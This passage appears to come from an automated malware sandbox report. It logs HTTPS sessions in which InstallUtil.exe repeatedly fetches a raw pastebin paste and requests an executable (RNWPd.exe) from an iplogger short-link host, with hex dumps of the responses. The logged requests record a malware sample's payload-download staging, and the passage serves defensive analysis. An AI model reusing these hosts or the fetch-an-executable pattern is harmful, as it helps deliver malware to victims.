                            2024-09-10 16:21:47 UTC1369INData Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69
                            Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                            2024-09-10 16:21:47 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:47 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.1149731104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:52 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:52 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c0eadffd7c90-EWR
                            2024-09-10 16:21:52 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:21:52 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:21:52 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:21:52 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:21:52 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.1149732188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:53 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:53 UTC898INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:21:53 +0000
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Tue, 10 Sep 2024 16:21:53 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YelecizBqIQR7En9K0CSleAZJJ983LFYjnChCZvT89Il9nV5Z7XKa7S5nfulcleHlg6D93WAzZYQ9%2BDBTeM0gcr13DbYthYoVTDgL3%2FaWN4caod3sdXaGW4%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c0eecbc441d3-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:21:53 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:53 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                            Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                            2024-09-10 16:21:53 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                            Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                            2024-09-10 16:21:53 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                            Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                            2024-09-10 16:21:53 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                            Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                            2024-09-10 16:21:53 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                            Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                            2024-09-10 16:21:53 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:53 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.1149733104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:58 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:58 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c110596f42a1-EWR
                            2024-09-10 16:21:58 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:21:58 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:21:58 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:21:58 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:21:58 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.1149734188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:59 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:59 UTC896INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:21:59 +0000
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Tue, 10 Sep 2024 16:21:59 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kVSjMdaVFQIKO0NxeUHxrHk17LmTbvo6lL8h7byFGCr31A6dEov2p8B9irnx3MQ5jSEpE4iLHJ0z6YGpcSLKiI8nHrA9HASBkjnu2%2BD8Or5A2tulwgYdsQU%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c1148e558cb9-EWR
                            alt-svc: h3=":443"; ma=86400
